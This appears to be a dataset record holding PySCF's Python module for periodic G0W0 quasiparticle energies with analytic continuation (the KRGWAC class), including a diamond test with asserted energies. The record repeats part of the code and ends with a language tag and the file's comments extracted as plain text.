log.info('GW nocc = %d, nvir = %d, nkpts = %d', nocc, nvir, nkpts)
if self.frozen is not None:
log.info('frozen orbitals %s', str(self.frozen))
logger.info(self, 'use perturbative linearized QP eqn = %s', self.linearized)
logger.info(self, 'analytic continuation method = %s', self.ac)
logger.info(self, 'GW finite size corrections = %s', self.fc)
return self
@property
def nocc(self):
return self.get_nocc()
@nocc.setter
def nocc(self, n):
self._nocc = n
@property
def nmo(self):
return self.get_nmo()
@nmo.setter
def nmo(self, n):
self._nmo = n
get_nocc = get_nocc
get_nmo = get_nmo
get_frozen_mask = get_frozen_mask
def kernel(self, mo_energy=None, mo_coeff=None, orbs=None, kptlist=None, nw=100):
"""
Input:
kptlist: self-energy k-points
orbs: self-energy orbs
nw: grid number
Output:
mo_energy: GW quasiparticle energy
"""
if mo_coeff is None:
mo_coeff = np.array(self._scf.mo_coeff)
if mo_energy is None:
mo_energy = np.array(self._scf.mo_energy)
nmo = self.nmo
naux = self.with_df.get_naoaux()
nkpts = self.nkpts
mem_incore = (2*nkpts*nmo**2*naux) * 16/1e6
mem_now = lib.current_memory()[0]
if (mem_incore + mem_now > 0.99*self.max_memory):
logger.warn(self, 'Memory may not be enough!')
raise NotImplementedError
cput0 = (time.clock(), time.time())
self.dump_flags()
self.converged, self.mo_energy, self.mo_coeff = \
kernel(self, mo_energy, mo_coeff, orbs=orbs,
kptlist=kptlist, nw=nw, verbose=self.verbose)
logger.warn(self, 'GW QP energies may not be sorted from min to max')
logger.timer(self, 'GW', *cput0)
return self.mo_energy
if __name__ == '__main__':
from pyscf.pbc import gto, dft, scf
from pyscf.pbc.lib import chkfile
import os
# This test takes a few minutes
cell = gto.Cell()
cell.build(unit = 'angstrom',
a = '''
0.000000 1.783500 1.783500
1.783500 0.000000 1.783500
1.783500 1.783500 0.000000
''',
atom = 'C 1.337625 1.337625 1.337625; C 2.229375 2.229375 2.229375',
dimension = 3,
max_memory = 8000,
verbose = 4,
pseudo = 'gth-pade',
basis='gth-szv',
precision=1e-10)
kpts = cell.make_kpts([3,1,1],scaled_center=[0,0,0])
gdf = df.GDF(cell, kpts)
gdf_fname = 'gdf_ints_311.h5'
gdf._cderi_to_save = gdf_fname
if not os.path.isfile(gdf_fname):
gdf.build()
chkfname = 'diamond_311.chk'
if os.path.isfile(chkfname):
kmf = dft.KRKS(cell, kpts)
kmf.xc = 'pbe'
kmf.with_df = gdf
kmf.with_df._cderi = gdf_fname
data = chkfile.load(chkfname, 'scf')
kmf.__dict__.update(data)
else:
kmf = dft.KRKS(cell, kpts)
kmf.xc = 'pbe'
kmf.with_df = gdf
kmf.with_df._cderi = gdf_fname
kmf.conv_tol = 1e-12
kmf.chkfile = chkfname
kmf.kernel()
gw = KRGWAC(kmf)
gw.linearized = False
gw.ac = 'pade'
# without finite size corrections
gw.fc = False
nocc = gw.nocc
gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
print(gw.mo_energy)
assert((abs(gw.mo_energy[0][nocc-1]-0.62045797))<1e-5)
assert((abs(gw.mo_energy[0][nocc]-0.96574324))<1e-5)
assert((abs(gw.mo_energy[1][nocc-1]-0.52639137))<1e-5)
assert((abs(gw.mo_energy[1][nocc]-1.07513258))<1e-5)
# with finite size corrections
gw.fc = True
gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
print(gw.mo_energy)
assert((abs(gw.mo_energy[0][nocc-1]-0.54277092))<1e-5)
assert((abs(gw.mo_energy[0][nocc]-0.80148537))<1e-5)
assert((abs(gw.mo_energy[1][nocc-1]-0.45073793))<1e-5)
assert((abs(gw.mo_energy[1][nocc]-0.92910108))<1e-5)
|
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
'''
PBC spin-restricted G0W0-AC QP eigenvalues with k-point sampling
This implementation has N^4 scaling, and is faster than GW-CD (N^4)
and analytic GW (N^6) methods.
GW-AC is recommended for valence states only, and is inaccuarate for core states.
Method:
See <NAME> and <NAME>, arxiv:2007.03148 (2020) for details
Compute Sigma on imaginary frequency with density fitting,
then analytically continued to real frequency.
Gaussian density fitting must be used (FFTDF and MDF are not supported).
'''
from functools import reduce
import time
import numpy
import numpy as np
import h5py
from scipy.optimize import newton, least_squares
from pyscf import lib
from pyscf.lib import logger
from pyscf.ao2mo import _ao2mo
from pyscf.ao2mo.incore import _conc_mos
from pyscf.pbc import df, dft, scf
from pyscf.pbc.mp.kmp2 import get_nocc, get_nmo, get_frozen_mask
from pyscf import __config__
einsum = lib.einsum
def kernel(gw, mo_energy, mo_coeff, orbs=None,
kptlist=None, nw=None, verbose=logger.NOTE):
'''GW-corrected quasiparticle orbital energies
Returns:
A list : converged, mo_energy, mo_coeff
'''
mf = gw._scf
if gw.frozen is None:
frozen = 0
else:
frozen = gw.frozen
assert (frozen == 0)
if orbs is None:
orbs = range(gw.nmo)
if kptlist is None:
kptlist = range(gw.nkpts)
nkpts = gw.nkpts
nklist = len(kptlist)
norbs = len(orbs)
# v_xc
dm = np.array(mf.make_rdm1())
v_mf = np.array(mf.get_veff()) - np.array(mf.get_j(dm_kpts=dm))
for k in range(nkpts):
v_mf[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), v_mf[k], mo_coeff[k]))
nocc = gw.nocc
nmo = gw.nmo
nvir = nmo-nocc
# v_hf from DFT/HF density
if gw.fc:
exxdiv = 'ewald'
else:
exxdiv = None
rhf = scf.KRHF(gw.mol, gw.kpts, exxdiv=exxdiv)
rhf.with_df = gw.with_df
if getattr(gw.with_df, '_cderi', None) is None:
raise RuntimeError('Found incompatible integral scheme %s.'
'KGWAC can be only used with GDF integrals' %
gw.with_df.__class__)
vk = rhf.get_veff(gw.mol,dm_kpts=dm) - rhf.get_j(gw.mol,dm_kpts=dm)
for k in range(nkpts):
vk[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), vk[k], mo_coeff[k]))
# Grids for integration on imaginary axis
freqs,wts = _get_scaled_legendre_roots(nw)
# Compute self-energy on imaginary axis i*[0,iw_cutoff]
sigmaI, omega = get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=5.)
# Analytic continuation
coeff = []
if gw.ac == 'twopole':
for k in range(nklist):
coeff.append(AC_twopole_diag(sigmaI[k], omega, orbs, nocc))
elif gw.ac == 'pade':
for k in range(nklist):
coeff_tmp, omega_fit = AC_pade_thiele_diag(sigmaI[k], omega)
coeff.append(coeff_tmp)
coeff = np.array(coeff)
conv = True
# This code does not support metals
homo = -99.; lumo = 99.
for k in range(nkpts):
if homo < mf.mo_energy[k][nocc-1]:
homo = mf.mo_energy[k][nocc-1]
if lumo > mf.mo_energy[k][nocc]:
lumo = mf.mo_energy[k][nocc]
ef = (homo+lumo)/2.
mo_energy = np.zeros_like(np.array(mf.mo_energy))
for k in range(nklist):
kn = kptlist[k]
for p in orbs:
if gw.linearized:
# linearized G0W0
de = 1e-6
ep = mf.mo_energy[kn][p]
#TODO: analytic sigma derivative
if gw.ac == 'twopole':
sigmaR = two_pole(ep-ef, coeff[k,:,p-orbs[0]]).real
dsigma = two_pole(ep-ef+de, coeff[k,:,p-orbs[0]]).real - sigmaR.real
elif gw.ac == 'pade':
sigmaR = pade_thiele(ep-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
dsigma = pade_thiele(ep-ef+de, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real - sigmaR.real
zn = 1.0/(1.0-dsigma/de)
e = ep + zn*(sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
mo_energy[kn,p] = e
else:
# self-consistently solve QP equation
def quasiparticle(omega):
if gw.ac == 'twopole':
sigmaR = two_pole(omega-ef, coeff[k,:,p-orbs[0]]).real
elif gw.ac == 'pade':
sigmaR = pade_thiele(omega-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
return omega - mf.mo_energy[kn][p] - (sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
try:
e = newton(quasiparticle, mf.mo_energy[kn][p], tol=1e-6, maxiter=100)
mo_energy[kn,p] = e
except RuntimeError:
conv = False
mo_coeff = mf.mo_coeff
if gw.verbose >= logger.DEBUG:
numpy.set_printoptions(threshold=nmo)
for k in range(nkpts):
logger.debug(gw, ' GW mo_energy @ k%d =\n%s', k,mo_energy[k])
numpy.set_printoptions(threshold=1000)
return conv, mo_energy, mo_coeff
def get_rho_response(gw, omega, mo_energy, Lpq, kL, kidx):
'''
Compute density response function in auxiliary basis at freq iw
'''
nkpts, naux, nmo, nmo = Lpq.shape
nocc = gw.nocc
kpts = gw.kpts
kscaled = gw.mol.get_scaled_kpts(kpts)
kscaled -= kscaled[0]
# Compute Pi for kL
Pi = np.zeros((naux,naux),dtype=np.complex128)
for i, kpti in enumerate(kpts):
# Find ka that conserves with ki and kL (-ki+ka+kL=G)
a = kidx[i]
eia = mo_energy[i,:nocc,None] - mo_energy[a,None,nocc:]
eia = eia/(omega**2+eia*eia)
Pia = einsum('Pia,ia->Pia',Lpq[i][:,:nocc,nocc:],eia)
# Response from both spin-up and spin-down density
Pi += 4./nkpts * einsum('Pia,Qia->PQ',Pia,Lpq[i][:,:nocc,nocc:].conj())
return Pi
def get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=None, max_memory=8000):
'''
Compute GW correlation self-energy (diagonal elements)
in MO basis on imaginary axis
'''
mo_energy = np.array(gw._scf.mo_energy)
mo_coeff = np.array(gw._scf.mo_coeff)
nocc = gw.nocc
nmo = gw.nmo
nkpts = gw.nkpts
kpts = gw.kpts
nklist = len(kptlist)
nw = len(freqs)
norbs = len(orbs)
mydf = gw.with_df
# possible kpts shift center
kscaled = gw.mol.get_scaled_kpts(kpts)
kscaled -= kscaled[0]
# This code does not support metals
homo = -99.; lumo = 99.
for k in range(nkpts):
if homo < mo_energy[k][nocc-1]:
homo = mo_energy[k][nocc-1]
if lumo > mo_energy[k][nocc]:
lumo = mo_energy[k][nocc]
if (lumo-homo)<1e-3:
logger.warn(gw, 'This GW-AC code is not supporting metals!')
ef = (homo+lumo)/2.
# Integration on numerical grids
if iw_cutoff is not None:
nw_sigma = sum(iw < iw_cutoff for iw in freqs) + 1
else:
nw_sigma = nw + 1
# Compute occ for -iw and vir for iw separately
# to avoid branch cuts in analytic continuation
omega_occ = np.zeros((nw_sigma),dtype=np.complex128)
omega_vir = np.zeros((nw_sigma),dtype=np.complex128)
omega_occ[0] = 1j*0.; omega_occ[1:] = -1j*freqs[:(nw_sigma-1)]
omega_vir[0] = 1j*0.; omega_vir[1:] = 1j*freqs[:(nw_sigma-1)]
orbs_occ = [i for i in orbs if i < nocc]
norbs_occ = len(orbs_occ)
emo_occ = np.zeros((nkpts,nmo,nw_sigma),dtype=np.complex128)
emo_vir = np.zeros((nkpts,nmo,nw_sigma),dtype=np.complex128)
for k in range(nkpts):
emo_occ[k] = omega_occ[None,:] + ef - mo_energy[k][:,None]
emo_vir[k] = omega_vir[None,:] + ef - mo_energy[k][:,None]
sigma = np.zeros((nklist,norbs,nw_sigma),dtype=np.complex128)
omega = np.zeros((norbs,nw_sigma),dtype=np.complex128)
for p in range(norbs):
orbp = orbs[p]
if orbp < nocc:
omega[p] = omega_occ.copy()
else:
omega[p] = omega_vir.copy()
if gw.fc:
# Set up q mesh for q->0 finite size correction
q_pts = np.array([1e-3,0,0]).reshape(1,3)
nq_pts = len(q_pts)
q_abs = gw.mol.get_abs_kpts(q_pts)
# Get qij = 1/sqrt(Omega) * < psi_{ik} | e^{iqr} | psi_{ak-q} > at q: (nkpts, nocc, nvir)
qij = get_qij(gw, q_abs[0], mo_coeff)
for kL in range(nkpts):
# Lij: (ki, L, i, j) for looping every kL
Lij = []
# kidx: save kj that conserves with kL and ki (-ki+kj+kL=G)
# kidx_r: save ki that conserves with kL and kj (-ki+kj+kL=G)
kidx = np.zeros((nkpts),dtype=np.int64)
kidx_r = np.zeros((nkpts),dtype=np.int64)
for i, kpti in enumerate(kpts):
for j, kptj in enumerate(kpts):
# Find (ki,kj) that satisfies momentum conservation with kL
kconserv = -kscaled[i] + kscaled[j] + kscaled[kL]
is_kconserv = np.linalg.norm(np.round(kconserv) - kconserv) < 1e-12
if is_kconserv:
kidx[i] = j
kidx_r[j] = i
logger.debug(gw, "Read Lpq (kL: %s / %s, ki: %s, kj: %s)"%(kL+1, nkpts, i, j))
Lij_out = None
# Read (L|pq) and ao2mo transform to (L|ij)
Lpq = []
for LpqR, LpqI, sign in mydf.sr_loop([kpti, kptj], max_memory=0.1*gw._scf.max_memory, compact=False):
Lpq.append(LpqR+LpqI*1.0j)
# support uneqaul naux on different k points
Lpq = np.vstack(Lpq).reshape(-1,nmo**2)
tao = []
ao_loc = None
moij, ijslice = _conc_mos(mo_coeff[i], mo_coeff[j])[2:]
Lij_out = _ao2mo.r_e2(Lpq, moij, ijslice, tao, ao_loc, out=Lij_out)
Lij.append(Lij_out.reshape(-1,nmo,nmo))
Lij = np.asarray(Lij)
naux = Lij.shape[1]
if kL == 0:
for w in range(nw):
# body dielectric matrix eps_body
Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
eps_body_inv = np.linalg.inv(np.eye(naux)-Pi)
if gw.fc:
# head dielectric matrix eps_00
Pi_00 = get_rho_response_head(gw, freqs[w], mo_energy, qij)
eps_00 = 1. - 4. * np.pi/np.linalg.norm(q_abs[0])**2 * Pi_00
# wings dielectric matrix eps_P0
Pi_P0 = get_rho_response_wing(gw, freqs[w], mo_energy, Lij, qij)
eps_P0 = -np.sqrt(4.*np.pi) / np.linalg.norm(q_abs[0]) * Pi_P0
# inverse dielectric matrix
eps_inv_00 = 1./(eps_00 - np.dot(np.dot(eps_P0.conj(),eps_body_inv),eps_P0))
eps_inv_P0 = -eps_inv_00 * np.dot(eps_body_inv, eps_P0)
# head correction
Del_00 = 2./np.pi * (6.*np.pi**2/gw.mol.vol/nkpts)**(1./3.) * (eps_inv_00 - 1.)
eps_inv_PQ = eps_body_inv
g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
for k in range(nklist):
kn = kptlist[k]
# Find km that conserves with kn and kL (-km+kn+kL=G)
km = kidx_r[kn]
Qmn = einsum('Pmn,PQ->Qmn',Lij[km][:,:,orbs].conj(),eps_inv_PQ-np.eye(naux))
Wmn = 1./nkpts * einsum('Qmn,Qmn->mn',Qmn,Lij[km][:,:,orbs])
sigma[k][:norbs_occ] += -einsum('mn,mw->nw',Wmn[:,:norbs_occ],g0_occ[km])/np.pi
sigma[k][norbs_occ:] += -einsum('mn,mw->nw',Wmn[:,norbs_occ:],g0_vir[km])/np.pi
if gw.fc:
# apply head correction
assert(kn == km)
sigma[k][:norbs_occ] += -Del_00 * g0_occ[kn][orbs][:norbs_occ] /np.pi
sigma[k][norbs_occ:] += -Del_00 * g0_vir[kn][orbs][norbs_occ:] /np.pi
# apply wing correction
Wn_P0 = einsum('Pnm,P->nm',Lij[kn],eps_inv_P0).diagonal()
Wn_P0 = Wn_P0.real * 2.
Del_P0 = np.sqrt(gw.mol.vol/4./np.pi**3) * (6.*np.pi**2/gw.mol.vol/nkpts)**(2./3.) * Wn_P0[orbs]
sigma[k][:norbs_occ] += -einsum('n,nw->nw',Del_P0[:norbs_occ],g0_occ[kn][orbs][:norbs_occ]) /np.pi
sigma[k][norbs_occ:] += -einsum('n,nw->nw',Del_P0[norbs_occ:],g0_vir[kn][orbs][norbs_occ:]) /np.pi
else:
for w in range(nw):
Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
Pi_inv = np.linalg.inv(np.eye(naux)-Pi)-np.eye(naux)
g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
for k in range(nklist):
kn = kptlist[k]
# Find km that conserves with kn and kL (-km+kn+kL=G)
km = kidx_r[kn]
Qmn = einsum('Pmn,PQ->Qmn',Lij[km][:,:,orbs].conj(),Pi_inv)
Wmn = 1./nkpts * einsum('Qmn,Qmn->mn',Qmn,Lij[km][:,:,orbs])
sigma[k][:norbs_occ] += -einsum('mn,mw->nw',Wmn[:,:norbs_occ],g0_occ[km])/np.pi
sigma[k][norbs_occ:] += -einsum('mn,mw->nw',Wmn[:,norbs_occ:],g0_vir[km])/np.pi
return sigma, omega
def get_rho_response_head(gw, omega, mo_energy, qij):
'''
Compute head (G=0, G'=0) density response function in auxiliary basis at freq iw
'''
nkpts, nocc, nvir = qij.shape
nocc = gw.nocc
kpts = gw.kpts
# Compute Pi head
Pi_00 = 0j
for i, kpti in enumerate(kpts):
eia = mo_energy[i,:nocc,None] - mo_energy[i,None,nocc:]
eia = eia/(omega**2+eia*eia)
Pi_00 += 4./nkpts * einsum('ia,ia->',eia,qij[i].conj()*qij[i])
return Pi_00
def get_rho_response_wing(gw, omega, mo_energy, Lpq, qij):
'''
Compute wing (G=P, G'=0) density response function in auxiliary basis at freq iw
'''
nkpts, naux, nmo, nmo = Lpq.shape
nocc = gw.nocc
kpts = gw.kpts
# Compute Pi wing
Pi = np.zeros(naux,dtype=np.complex128)
for i, kpti in enumerate(kpts):
eia = mo_energy[i,:nocc,None] - mo_energy[i,None,nocc:]
eia = eia/(omega**2+eia*eia)
eia_q = eia * qij[i].conj()
Pi += 4./nkpts * einsum('Pia,ia->P',Lpq[i][:,:nocc,nocc:],eia_q)
return Pi
def get_qij(gw, q, mo_coeff, uniform_grids=False):
'''
Compute qij = 1/Omega * |< psi_{ik} | e^{iqr} | psi_{ak-q} >|^2 at q: (nkpts, nocc, nvir)
through kp perturbtation theory
Ref: Phys. Rev. B 83, 245122 (2011)
'''
nocc = gw.nocc
nmo = gw.nmo
nvir = nmo - nocc
kpts = gw.kpts
nkpts = len(kpts)
cell = gw.mol
mo_energy = gw._scf.mo_energy
if uniform_grids:
mydf = df.FFTDF(cell, kpts=kpts)
coords = cell.gen_uniform_grids(mydf.mesh)
else:
coords, weights = dft.gen_grid.get_becke_grids(cell,level=5)
ngrid = len(coords)
qij = np.zeros((nkpts,nocc,nvir),dtype=np.complex128)
for i, kpti in enumerate(kpts):
ao_p = dft.numint.eval_ao(cell, coords, kpt=kpti, deriv=1)
ao = ao_p[0]
ao_grad = ao_p[1:4]
if uniform_grids:
ao_ao_grad = einsum('mg,xgn->xmn',ao.T.conj(),ao_grad) * cell.vol / ngrid
else:
ao_ao_grad = einsum('g,mg,xgn->xmn',weights,ao.T.conj(),ao_grad)
q_ao_ao_grad = -1j * einsum('x,xmn->mn',q,ao_ao_grad)
q_mo_mo_grad = np.dot(np.dot(mo_coeff[i][:,:nocc].T.conj(), q_ao_ao_grad), mo_coeff[i][:,nocc:])
enm = 1./(mo_energy[i][nocc:,None] - mo_energy[i][None,:nocc])
dens = enm.T * q_mo_mo_grad
qij[i] = dens / np.sqrt(cell.vol)
return qij
def _get_scaled_legendre_roots(nw):
"""
Scale nw Legendre roots, which lie in the
interval [-1, 1], so that they lie in [0, inf)
Ref: www.cond-mat.de/events/correl19/manuscripts/ren.pdf
Returns:
freqs : 1D ndarray
wts : 1D ndarray
"""
freqs, wts = np.polynomial.legendre.leggauss(nw)
x0 = 0.5
freqs_new = x0*(1.+freqs)/(1.-freqs)
wts = wts*2.*x0/(1.-freqs)**2
return freqs_new, wts
def _get_clenshaw_curtis_roots(nw):
"""
Clenshaw-Curtis qaudrature on [0,inf)
Ref: J. Chem. Phys. 132, 234114 (2010)
Returns:
freqs : 1D ndarray
wts : 1D ndarray
"""
freqs = np.zeros(nw)
wts = np.zeros(nw)
a = 0.2
for w in range(nw):
t = (w+1.0)/nw * np.pi/2.
freqs[w] = a / np.tan(t)
if w != nw-1:
wts[w] = a*np.pi/2./nw/(np.sin(t)**2)
else:
wts[w] = a*np.pi/4./nw/(np.sin(t)**2)
return freqs[::-1], wts[::-1]
def two_pole_fit(coeff, omega, sigma):
cf = coeff[:5] + 1j*coeff[5:]
f = cf[0] + cf[1]/(omega+cf[3]) + cf[2]/(omega+cf[4]) - sigma
f[0] = f[0]/0.01
return np.array([f.real,f.imag]).reshape(-1)
def two_pole(freqs, coeff):
cf = coeff[:5] + 1j*coeff[5:]
return cf[0] + cf[1]/(freqs+cf[3]) + cf[2]/(freqs+cf[4])
def AC_twopole_diag(sigma, omega, orbs, nocc):
"""
Analytic continuation to real axis using a two-pole model
Returns:
coeff: 2D array (ncoeff, norbs)
"""
norbs, nw = sigma.shape
coeff = np.zeros((10,norbs))
for p in range(norbs):
target = np.array([sigma[p].real,sigma[p].imag]).reshape(-1)
if orbs[p] < nocc:
x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, -1.0, -0.5])
else:
x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, 1.0, 0.5])
#TODO: analytic gradient
xopt = least_squares(two_pole_fit, x0, jac='3-point', method='trf', xtol=1e-10,
gtol = 1e-10, max_nfev=1000, verbose=0, args=(omega[p], sigma[p]))
if xopt.success is False:
print('WARN: 2P-Fit Orb %d not converged, cost function %e'%(p,xopt.cost))
coeff[:,p] = xopt.x.copy()
return coeff
def thiele(fn,zn):
nfit = len(zn)
g = np.zeros((nfit,nfit),dtype=np.complex128)
g[:,0] = fn.copy()
for i in range(1,nfit):
g[i:,i] = (g[i-1,i-1]-g[i:,i-1])/((zn[i:]-zn[i-1])*g[i:,i-1])
a = g.diagonal()
return a
def pade_thiele(freqs,zn,coeff):
nfit = len(coeff)
X = coeff[-1]*(freqs-zn[-2])
for i in range(nfit-1):
idx = nfit-i-1
X = coeff[idx]*(freqs-zn[idx-1])/(1.+X)
X = coeff[0]/(1.+X)
return X
def AC_pade_thiele_diag(sigma, omega):
"""
Analytic continuation to real axis using a Pade approximation
from Thiele's reciprocal difference method
Reference: <NAME>. Phys. 29, 179 (1977)
Returns:
coeff: 2D array (ncoeff, norbs)
omega: 2D array (norbs, npade)
"""
idx = range(1,40,6)
sigma1 = sigma[:,idx].copy()
sigma2 = sigma[:,(idx[-1]+4)::4].copy()
sigma = np.hstack((sigma1,sigma2))
omega1 = omega[:,idx].copy()
omega2 = omega[:,(idx[-1]+4)::4].copy()
omega = np.hstack((omega1,omega2))
norbs, nw = sigma.shape
npade = nw // 2
coeff = np.zeros((npade*2,norbs),dtype=np.complex128)
for p in range(norbs):
coeff[:,p] = thiele(sigma[p,:npade*2], omega[p,:npade*2])
return coeff, omega[:,:npade*2]
class KRGWAC(lib.StreamObject):
linearized = getattr(__config__, 'gw_gw_GW_linearized', False)
# Analytic continuation: pade or twopole
ac = getattr(__config__, 'gw_gw_GW_ac', 'pade')
# Whether applying finite size corrections
fc = getattr(__config__, 'gw_gw_GW_fc', True)
def __init__(self, mf, frozen=0):
self.mol = mf.mol
self._scf = mf
self.verbose = self.mol.verbose
self.stdout = self.mol.stdout
self.max_memory = mf.max_memory
#TODO: implement frozen orbs
if frozen > 0:
raise NotImplementedError
self.frozen = frozen
# DF-KGW must use GDF integrals
if getattr(mf, 'with_df', None):
self.with_df = mf.with_df
else:
raise NotImplementedError
self._keys.update(['with_df'])
##################################################
# don't modify the following attributes, they are not input options
self._nocc = None
self._nmo = None
self.kpts = mf.kpts
self.nkpts = len(self.kpts)
# self.mo_energy: GW quasiparticle energy, not scf mo_energy
self.mo_energy = None
self.mo_coeff = mf.mo_coeff
self.mo_occ = mf.mo_occ
self.sigma = None
keys = set(('linearized','ac','fc'))
self._keys = set(self.__dict__.keys()).union(keys)
def dump_flags(self):
log = logger.Logger(self.stdout, self.verbose)
log.info('')
log.info('******** %s ********', self.__class__)
log.info('method = %s', self.__class__.__name__)
nocc = self.nocc
nvir = self.nmo - nocc
nkpts = self.nkpts
log.info('GW nocc = %d, nvir = %d, nkpts = %d', nocc, nvir, nkpts)
if self.frozen is not None:
log.info('frozen orbitals %s', str(self.frozen))
logger.info(self, 'use perturbative linearized QP eqn = %s', self.linearized)
logger.info(self, 'analytic continuation method = %s', self.ac)
logger.info(self, 'GW finite size corrections = %s', self.fc)
return self
@property
def nocc(self):
return self.get_nocc()
@nocc.setter
def nocc(self, n):
self._nocc = n
@property
def nmo(self):
return self.get_nmo()
@nmo.setter
def nmo(self, n):
self._nmo = n
get_nocc = get_nocc
get_nmo = get_nmo
get_frozen_mask = get_frozen_mask
def kernel(self, mo_energy=None, mo_coeff=None, orbs=None, kptlist=None, nw=100):
"""
Input:
kptlist: self-energy k-points
orbs: self-energy orbs
nw: grid number
Output:
mo_energy: GW quasiparticle energy
"""
if mo_coeff is None:
mo_coeff = np.array(self._scf.mo_coeff)
if mo_energy is None:
mo_energy = np.array(self._scf.mo_energy)
nmo = self.nmo
naux = self.with_df.get_naoaux()
nkpts = self.nkpts
mem_incore = (2*nkpts*nmo**2*naux) * 16/1e6
mem_now = lib.current_memory()[0]
if (mem_incore + mem_now > 0.99*self.max_memory):
logger.warn(self, 'Memory may not be enough!')
raise NotImplementedError
cput0 = (time.clock(), time.time())
self.dump_flags()
self.converged, self.mo_energy, self.mo_coeff = \
kernel(self, mo_energy, mo_coeff, orbs=orbs,
kptlist=kptlist, nw=nw, verbose=self.verbose)
logger.warn(self, 'GW QP energies may not be sorted from min to max')
logger.timer(self, 'GW', *cput0)
return self.mo_energy
if __name__ == '__main__':
from pyscf.pbc import gto, dft, scf
from pyscf.pbc.lib import chkfile
import os
# This test takes a few minutes
cell = gto.Cell()
cell.build(unit = 'angstrom',
a = '''
0.000000 1.783500 1.783500
1.783500 0.000000 1.783500
1.783500 1.783500 0.000000
''',
atom = 'C 1.337625 1.337625 1.337625; C 2.229375 2.229375 2.229375',
dimension = 3,
max_memory = 8000,
verbose = 4,
pseudo = 'gth-pade',
basis='gth-szv',
precision=1e-10)
kpts = cell.make_kpts([3,1,1],scaled_center=[0,0,0])
gdf = df.GDF(cell, kpts)
gdf_fname = 'gdf_ints_311.h5'
gdf._cderi_to_save = gdf_fname
if not os.path.isfile(gdf_fname):
gdf.build()
chkfname = 'diamond_311.chk'
if os.path.isfile(chkfname):
kmf = dft.KRKS(cell, kpts)
kmf.xc = 'pbe'
kmf.with_df = gdf
kmf.with_df._cderi = gdf_fname
data = chkfile.load(chkfname, 'scf')
kmf.__dict__.update(data)
else:
kmf = dft.KRKS(cell, kpts)
kmf.xc = 'pbe'
kmf.with_df = gdf
kmf.with_df._cderi = gdf_fname
kmf.conv_tol = 1e-12
kmf.chkfile = chkfname
kmf.kernel()
gw = KRGWAC(kmf)
gw.linearized = False
gw.ac = 'pade'
# without finite size corrections
gw.fc = False
nocc = gw.nocc
gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
print(gw.mo_energy)
assert((abs(gw.mo_energy[0][nocc-1]-0.62045797))<1e-5)
assert((abs(gw.mo_energy[0][nocc]-0.96574324))<1e-5)
assert((abs(gw.mo_energy[1][nocc-1]-0.52639137))<1e-5)
assert((abs(gw.mo_energy[1][nocc]-1.07513258))<1e-5)
# with finite size corrections
gw.fc = True
gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
print(gw.mo_energy)
assert((abs(gw.mo_energy[0][nocc-1]-0.54277092))<1e-5)
assert((abs(gw.mo_energy[0][nocc]-0.80148537))<1e-5)
assert((abs(gw.mo_energy[1][nocc-1]-0.45073793))<1e-5)
assert((abs(gw.mo_energy[1][nocc]-0.92910108))<1e-5)
|
en
| 0.750797
|
#!/usr/bin/env python # Copyright 2014-2020 The PySCF Developers. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Author: <NAME> <<EMAIL>> # PBC spin-restricted G0W0-AC QP eigenvalues with k-point sampling This implementation has N^4 scaling, and is faster than GW-CD (N^4) and analytic GW (N^6) methods. GW-AC is recommended for valence states only, and is inaccuarate for core states. Method: See <NAME> and <NAME>, arxiv:2007.03148 (2020) for details Compute Sigma on imaginary frequency with density fitting, then analytically continued to real frequency. Gaussian density fitting must be used (FFTDF and MDF are not supported). GW-corrected quasiparticle orbital energies Returns: A list : converged, mo_energy, mo_coeff # v_xc # v_hf from DFT/HF density # Grids for integration on imaginary axis # Compute self-energy on imaginary axis i*[0,iw_cutoff] # Analytic continuation # This code does not support metals # linearized G0W0 #TODO: analytic sigma derivative # self-consistently solve QP equation Compute density response function in auxiliary basis at freq iw # Compute Pi for kL # Find ka that conserves with ki and kL (-ki+ka+kL=G) # Response from both spin-up and spin-down density Compute GW correlation self-energy (diagonal elements) in MO basis on imaginary axis # possible kpts shift center # This code does not support metals # Integration on numerical grids # Compute occ for -iw and vir for iw separately # to avoid branch cuts in analytic continuation # Set up q mesh for q->0 finite size correction # Get qij = 1/sqrt(Omega) * < psi_{ik} | e^{iqr} | psi_{ak-q} > at q: (nkpts, nocc, nvir) # Lij: (ki, L, i, j) for looping every kL # kidx: save kj that conserves with kL and ki (-ki+kj+kL=G) # kidx_r: save ki that conserves with kL and kj (-ki+kj+kL=G) # Find (ki,kj) that satisfies momentum conservation with kL # Read 